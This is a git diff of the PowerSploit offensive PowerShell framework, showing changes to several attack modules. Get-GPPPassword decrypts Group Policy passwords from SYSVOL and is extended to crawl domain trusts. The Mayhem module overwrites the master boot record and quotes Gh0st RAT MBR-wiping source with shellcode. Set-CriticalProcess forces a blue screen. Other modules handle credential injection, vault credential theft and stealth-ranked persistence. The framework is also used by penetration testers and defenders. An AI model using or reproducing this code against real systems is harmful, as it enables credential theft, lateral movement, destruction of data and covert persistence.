EXAMPLE.COM - NewName : [BLANK] - Changed : {2014-02-21 05:28:53} - Passwords : {password12} - UserNames : {test1} - File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml +Get-GPPPassword -Server EXAMPLE.COM - NewName : {mspresenters} - Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} - Passwords : {Recycling*3ftw!, password123, password1234} - UserNames : {Administrator (built-in), DummyAccount, dummy2} - File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml +NewName : [BLANK] +Changed : {2014-02-21 05:28:53} +Passwords : {password12} +UserNames : {test1} +File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml + +NewName : {mspresenters} +Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} +Passwords : {Recycling*3ftw!, password123, password1234} +UserNames : {Administrator (built-in), DummyAccount, dummy2} +File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml .EXAMPLE - PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq - - password - password12 - password123 - password1234 - password1234$ - read123 - Recycling*3ftw! +Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq + +password +password12 +password123 +password1234 +password1234$ +read123 +Recycling*3ftw! .LINK - - http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html - https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 - http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences - http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html + +http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html #> - + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] [CmdletBinding()] Param ( - [ValidateNotNullOrEmpty()] - [String] - $Server = $Env:USERDNSDOMAIN + [ValidateNotNullOrEmpty()] + [String] + $Server = $Env:USERDNSDOMAIN, + + [Switch] + $SearchForest ) - - #Some XML issues between versions - Set-StrictMode -Version 2 - - #define helper function that decodes and decrypts password + + # define helper function that decodes and decrypts password function Get-DecryptedCpassword { [CmdletBinding()] Param ( - [string] $Cpassword + [string] $Cpassword ) try { - #Append appropriate padding based on string length + #Append appropriate padding based on string length $Mod = ($Cpassword.length % 4) - + switch ($Mod) { - '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} - '2' {$Cpassword += ('=' * (4 - $Mod))} - '3' {$Cpassword += ('=' * (4 - $Mod))} + '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} + '2' {$Cpassword += ('=' * (4 - $Mod))} + '3' {$Cpassword += ('=' * (4 - $Mod))} } $Base64Decoded = [Convert]::FromBase64String($Cpassword) + # Make sure System.Core is loaded + [System.Reflection.Assembly]::LoadWithPartialName("System.Core") |Out-Null + #Create a new AES .NET Crypto Object $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) - + #Set IV to all nulls to prevent dynamic generation of IV value - $AesIV = New-Object Byte[]($AesObject.IV.Length) + $AesIV = New-Object Byte[]($AesObject.IV.Length) $AesObject.IV = $AesIV $AesObject.Key = $AesKey - $DecryptorObject = $AesObject.CreateDecryptor() + $DecryptorObject = $AesObject.CreateDecryptor() [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length) - + return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) - } - - catch {Write-Error $Error[0]} - } - - #define helper function to parse fields from xml files - function Get-GPPInnerFields { + } + + catch { Write-Error $Error[0] } + } + + # helper function to parse fields from xml files + function Get-GPPInnerField { [CmdletBinding()] Param ( $File ) - + try { - $Filename = Split-Path $File -Leaf [xml] $Xml = Get-Content ($File) - #declare empty arrays - $Cpassword = @() - $UserName = @() - $NewName = @() - $Changed = @() - $Password = @() - - #check for password field - if ($Xml.innerxml -like "*cpassword*"){ - - Write-Verbose "Potential password in $File" - - switch ($Filename) { - - 'Groups.xml' { - $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} - } - - 'Services.xml' { - $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} - } - - 'Scheduledtasks.xml' { - $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} - } - - 'DataSources.xml' { - $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + # check for the cpassword field + if ($Xml.innerxml -match 'cpassword') { + + $Xml.GetElementsByTagName('Properties') | ForEach-Object { + if ($_.cpassword) { + $Cpassword = $_.cpassword + if ($Cpassword -and ($Cpassword -ne '')) { + $DecryptedPassword = Get-DecryptedCpassword $Cpassword + $Password = $DecryptedPassword + Write-Verbose "[Get-GPPInnerField] Decrypted password in '$File'" + } + + if ($_.newName) { + $NewName = $_.newName + } + + if ($_.userName) { + $UserName = $_.userName + } + elseif ($_.accountName) { + $UserName = $_.accountName + } + elseif ($_.runAs) { + $UserName = $_.runAs + } + + try { + $Changed = $_.ParentNode.changed + } + catch { + Write-Verbose "[Get-GPPInnerField] Unable to retrieve ParentNode.changed for '$File'" + } + + try { + $NodeName = $_.ParentNode.ParentNode.LocalName + } + catch { + Write-Verbose "[Get-GPPInnerField] Unable to retrieve ParentNode.ParentNode.LocalName for '$File'" + } + + if (!($Password)) {$Password = '[BLANK]'} + if (!($UserName)) {$UserName = '[BLANK]'} + if (!($Changed)) {$Changed = '[BLANK]'} + if (!($NewName)) {$NewName = '[BLANK]'} + + $GPPPassword = New-Object PSObject + $GPPPassword | Add-Member Noteproperty 'UserName' $UserName + $GPPPassword | Add-Member Noteproperty 'NewName' $NewName + $GPPPassword | Add-Member Noteproperty 'Password' $Password + $GPPPassword | Add-Member Noteproperty 'Changed' $Changed + $GPPPassword | Add-Member Noteproperty 'File' $File + $GPPPassword | Add-Member Noteproperty 'NodeName' $NodeName + $GPPPassword | Add-Member Noteproperty 'Cpassword' $Cpassword + $GPPPassword } - - 'Printers.xml' { - $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } + } + } + catch { + Write-Warning "[Get-GPPInnerField] Error parsing file '$File' : $_" + } + } + + # helper function (adapted from PowerView) to enumerate the domain/forest trusts for a specified domain + function Get-DomainTrust { + [CmdletBinding()] + Param ( + $Domain + ) + + if (Test-Connection -Count 1 -Quiet -ComputerName $Domain) { + try { + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) + $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) + if ($DomainObject) { + $DomainObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName + } + } + catch { + Write-Verbose "[Get-DomainTrust] Error contacting domain '$Domain' : $_" + } + + try { + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Domain) + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + if ($ForestObject) { + $ForestObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName + } + } + catch { + Write-Verbose "[Get-DomainTrust] Error contacting forest '$Domain' (domain may not be a forest object) : $_" + } + } + } + + # helper function (adapted from PowerView) to enumerate all reachable trusts from the current domain + function Get-DomainTrustMapping { + [CmdletBinding()] + Param () + + # keep track of domains seen so we don't hit infinite recursion + $SeenDomains = @{} + + # our domain stack tracker + $Domains = New-Object System.Collections.Stack + + try { + $CurrentDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name + $CurrentDomain + } + catch { + Write-Warning "[Get-DomainTrustMapping] Error enumerating current domain: $_" + } + + if ($CurrentDomain -and $CurrentDomain -ne '') { + $Domains.Push($CurrentDomain) + + while($Domains.Count -ne 0) { + + $Domain = $Domains.Pop() + + # if we haven't seen this domain before + if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) { + + Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'" + + # mark it as seen in our list + $Null = $SeenDomains.Add($Domain, '') + + try { + # get all the domain/forest trusts for this domain + Get-DomainTrust -Domain $Domain | Sort-Object -Unique | ForEach-Object { + # only output if we haven't already seen this domain and if it's pingable + if (-not $SeenDomains.ContainsKey($_) -and (Test-Connection -Count 1 -Quiet -ComputerName $_)) { + $Null = $Domains.Push($_) + $_ + } + } } - - 'Drives.xml' { - $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + catch { + Write-Verbose "[Get-DomainTrustMapping] Error: $_" } } - } - - foreach ($Pass in $Cpassword) { - Write-Verbose "Decrypting $Pass" - $DecryptedPassword = Get-DecryptedCpassword $Pass - Write-Verbose "Decrypted a password of $DecryptedPassword" - #append any new passwords to array - $Password += , $DecryptedPassword - } - - #put [BLANK] in variables - if (!($Password)) {$Password = '[BLANK]'} - if (!($UserName)) {$UserName = '[BLANK]'} - if (!($Changed)) {$Changed = '[BLANK]'} - if (!($NewName)) {$NewName = '[BLANK]'} - - #Create custom object to output results - $ObjectProperties = @{'Passwords' = $Password; - 'UserNames' = $UserName; - 'Changed' = $Changed; - 'NewName' = $NewName; - 'File' = $File} - - $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties - Write-Verbose "The password is between {} and may be more than one value." - if ($ResultsObject) {Return $ResultsObject} + } } - - catch {Write-Error $Error[0]} } - + try { - #ensure that machine is domain joined and script is running as a domain account - if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { - throw 'Machine is not a domain member or User is not a member of the domain.' + $XMLFiles = @() + $Domains = @() + + $AllUsers = $Env:ALLUSERSPROFILE + if (-not $AllUsers) { + $AllUsers = 'C:\ProgramData' + } + + # discover any locally cached GPP .xml files + Write-Verbose '[Get-GPPPassword] Searching local host for any cached GPP files' + $XMLFiles += Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue + + if ($SearchForest) { + Write-Verbose '[Get-GPPPassword] Searching for all reachable trusts' + $Domains += Get-DomainTrustMapping + } + else { + if ($Server) { + $Domains += , $Server + } + else { + # in case we're in a SYSTEM context + $Domains += , [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name + } } - #discover potential files containing passwords ; not complaining in case of denied access to a directory - Write-Verbose "Searching \\$Server\SYSVOL. This could take a while." - $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' - - if ( -not $XMlFiles ) {throw 'No preference files found.'} - - Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." - - foreach ($File in $XMLFiles) { - $Result = (Get-GppInnerFields $File.Fullname) - Write-Output $Result + $Domains = $Domains | Where-Object {$_} | Sort-Object -Unique + + ForEach ($Domain in $Domains) { + # discover potential domain GPP files containing passwords, not complaining in case of denied access to a directory + Write-Verbose "[Get-GPPPassword] Searching \\$Domain\SYSVOL\*\Policies. This could take a while." + $DomainXMLFiles = Get-ChildItem -Force -Path "\\$Domain\SYSVOL\*\Policies" -Recurse -ErrorAction SilentlyContinue -Include @('Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml') + + if($DomainXMLFiles) { + $XMLFiles += $DomainXMLFiles + } + } + + if ( -not $XMLFiles ) { throw '[Get-GPPPassword] No preference files found.' } + + Write-Verbose "[Get-GPPPassword] Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." + + ForEach ($File in $XMLFiles) { + $Result = (Get-GppInnerField $File.Fullname) + $Result } } - catch {Write-Error $Error[0]} + catch { Write-Error $Error[0] } } diff --git a/Exfiltration/Get-VaultCredential.ps1 b/Exfiltration/Get-VaultCredential.ps1 index 57570e83..e37f3fcf 100644 --- a/Exfiltration/Get-VaultCredential.ps1 +++ b/Exfiltration/Get-VaultCredential.ps1 @@ -28,8 +28,6 @@ Only web credentials can be displayed in cleartext. [CmdletBinding()] Param() $OSVersion = [Environment]::OSVersion.Version - $OSMajor = $OSVersion.Major - $OSMinor = $OSVersion.Minor #region P/Invoke declarations for vaultcli.dll $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil') @@ -79,7 +77,7 @@ Only web credentials can be displayed in cleartext. $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public') $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public') $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public') - if ($OSMajor -ge 6 -and $OSMinor -ge 2) + if ($OSVersion -ge '6.2') { $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public') } @@ -149,7 +147,7 @@ Only web credentials can be displayed in cleartext. [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) - if ($OSMajor -ge 6 -and $OSMinor -ge 2) + if ($OSVersion -ge '6.2') { $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', 'vaultcli.dll', @@ -317,7 +315,7 @@ Only web credentials can be displayed in cleartext. $PasswordVaultItem = [IntPtr]::Zero - if ($OSMajor -ge 6 -and $OSMinor -ge 2) + if ($OSVersion -ge '6.2') { $Result = $Vaultcli::VaultGetItem($VaultHandle, [Ref] $CurrentItem.SchemaId, diff --git a/Exfiltration/Invoke-CredentialInjection.ps1 b/Exfiltration/Invoke-CredentialInjection.ps1 index d6f3c4cf..b0253282 100644 --- a/Exfiltration/Invoke-CredentialInjection.ps1 +++ b/Exfiltration/Invoke-CredentialInjection.ps1 @@ -2416,7 +2416,7 @@ function Invoke-CredentialInjection $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false @@ -2474,7 +2474,7 @@ function Invoke-CredentialInjection Write-Verbose "Allocating memory for the PE and write its headers to memory" [IntPtr]$LoadAddr = [IntPtr]::Zero - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue [IntPtr]$LoadAddr = $OriginalImageBase @@ -3346,7 +3346,7 @@ function Invoke-CredentialInjection } elseif ($PsCmdlet.ParameterSetName -ieq "ExistingWinLogon") { - $WinLogonProcessId = (Get-Process -Name "winlogon")[0].Id + $WinLogonProcessId = (Get-Process -Name "winlogon"| Select-Object -first 1).Id } #Get a ushort representing the logontype diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index f22d5f5b..e3eb8f05 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -2205,7 +2205,7 @@ $RemoteScriptBlock = { $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false @@ -2263,7 +2263,7 @@ $RemoteScriptBlock = { Write-Verbose "Allocating memory for the PE and write its headers to memory" [IntPtr]$LoadAddr = [IntPtr]::Zero - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue [IntPtr]$LoadAddr = $OriginalImageBase diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1 index 0baaf3ed..5fbdde25 100644 --- a/Mayhem/Mayhem.psm1 +++ b/Mayhem/Mayhem.psm1 @@ -3,109 +3,109 @@ function Set-MasterBootRecord <# .SYNOPSIS - Proof of concept code that overwrites the master boot record with the - message of your choice. - - PowerSploit Function: Set-MasterBootRecord - Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - +Proof of concept code that overwrites the master boot record with the +message of your choice. + +PowerSploit Function: Set-MasterBootRecord +Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION - Set-MasterBootRecord is proof of concept code designed to show that it is - possible with PowerShell to overwrite the MBR. This technique was taken - from a public malware sample. This script is inteded solely as proof of - concept code. +Set-MasterBootRecord is proof of concept code designed to show that it is +possible with PowerShell to overwrite the MBR. This technique was taken +from a public malware sample. This script is inteded solely as proof of +concept code. .PARAMETER BootMessage - Specifies the message that will be displayed upon making your computer a brick. +Specifies the message that will be displayed upon making your computer a brick. .PARAMETER RebootImmediately - Reboot the machine immediately upon overwriting the MBR. +Reboot the machine immediately upon overwriting the MBR. .PARAMETER Force - Suppress the warning prompt. +Suppress the warning prompt. .EXAMPLE - Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' +Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' .NOTES - Obviously, this will only work if you have a master boot record to - overwrite. This won't work if you have a GPT (GUID partition table) -#> +Obviously, this will only work if you have a master boot record to +overwrite. This won't work if you have a GPT (GUID partition table). -<# This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): -// CGh0stApp message handlers - -unsigned char scode[] = -"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" -"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" -"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; - -int CGh0stApp::KillMBR() -{ - HANDLE hDevice; - DWORD dwBytesWritten, dwBytesReturned; - BYTE pMBR[512] = {0}; - - // ????MBR - memcpy(pMBR, scode, sizeof(scode) - 1); - pMBR[510] = 0x55; - pMBR[511] = 0xAA; - - hDevice = CreateFile - ( - "\\\\.\\PHYSICALDRIVE0", - GENERIC_READ | GENERIC_WRITE, - FILE_SHARE_READ | FILE_SHARE_WRITE, - NULL, - OPEN_EXISTING, - 0, - NULL - ); - if (hDevice == INVALID_HANDLE_VALUE) - return -1; - DeviceIoControl - ( - hDevice, - FSCTL_LOCK_VOLUME, - NULL, - 0, - NULL, - 0, - &dwBytesReturned, - NULL - ); - // ?????? - WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); - DeviceIoControl - ( - hDevice, - FSCTL_UNLOCK_VOLUME, - NULL, - 0, - NULL, - 0, - &dwBytesReturned, - NULL - ); - CloseHandle(hDevice); - - ExitProcess(-1); - return 0; -} +// CGh0stApp message handlers + +unsigned char scode[] = +"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" +"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" +"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; + +int CGh0stApp::KillMBR() +{ + HANDLE hDevice; + DWORD dwBytesWritten, dwBytesReturned; + BYTE pMBR[512] = {0}; + + // ????MBR + memcpy(pMBR, scode, sizeof(scode) - 1); + pMBR[510] = 0x55; + pMBR[511] = 0xAA; + + hDevice = CreateFile + ( + "\\\\.\\PHYSICALDRIVE0", + GENERIC_READ | GENERIC_WRITE, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return -1; + DeviceIoControl + ( + hDevice, + FSCTL_LOCK_VOLUME, + NULL, + 0, + NULL, + 0, + &dwBytesReturned, + NUL + ) + // ?????? + WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); + DeviceIoControl + ( + hDevice, + FSCTL_UNLOCK_VOLUME, + NULL, + 0, + NULL, + 0, + &dwBytesReturned, + NULL + ); + CloseHandle(hDevice); + + ExitProcess(-1); + return 0; +} #> - [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] + Param ( [ValidateLength(1, 479)] [String] $BootMessage = 'Stop-Crying; Get-NewHardDrive', @@ -220,7 +220,7 @@ int CGh0stApp::KillMBR() $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) # Zero-initialize the allocated unmanaged memory - 0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } + 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) @@ -272,11 +272,11 @@ function Set-CriticalProcess Causes your machine to blue screen upon exiting PowerShell. -PowerSploit Function: Set-CriticalProcess -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Set-CriticalProcess +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .PARAMETER ExitImmediately @@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose #> - [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] + Param ( [Switch] $Force, @@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose { $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.') } - + if (!$Response) { return diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index 0861af67..80aa5a28 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -3,84 +3,86 @@ function New-ElevatedPersistenceOption <# .SYNOPSIS - Configure elevated persistence options for the Add-Persistence function. - - PowerSploit Function: New-ElevatedPersistenceOption - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - +Configure elevated persistence options for the Add-Persistence function. + +PowerSploit Function: New-ElevatedPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION - New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. +New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. .PARAMETER PermanentWMI - Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. +Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. - Detection Difficulty: Difficult - Removal Difficulty: Difficult - User Detectable? No +Detection Difficulty: Difficult +Removal Difficulty: Difficult +User Detectable? No .PARAMETER ScheduledTask - Persist via a scheduled task. +Persist via a scheduled task. - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? No .PARAMETER Registry - Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. +Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? Yes .PARAMETER AtLogon - Starts the payload upon any user logon. +Starts the payload upon any user logon. .PARAMETER AtStartup - Starts the payload within 240 and 325 seconds of computer startup. +Starts the payload within 240 and 325 seconds of computer startup. .PARAMETER OnIdle - Starts the payload after one minute of idling. +Starts the payload after one minute of idling. .PARAMETER Daily - Starts the payload daily. +Starts the payload daily. .PARAMETER Hourly - Starts the payload hourly. +Starts the payload hourly. .PARAMETER At - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. +Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', 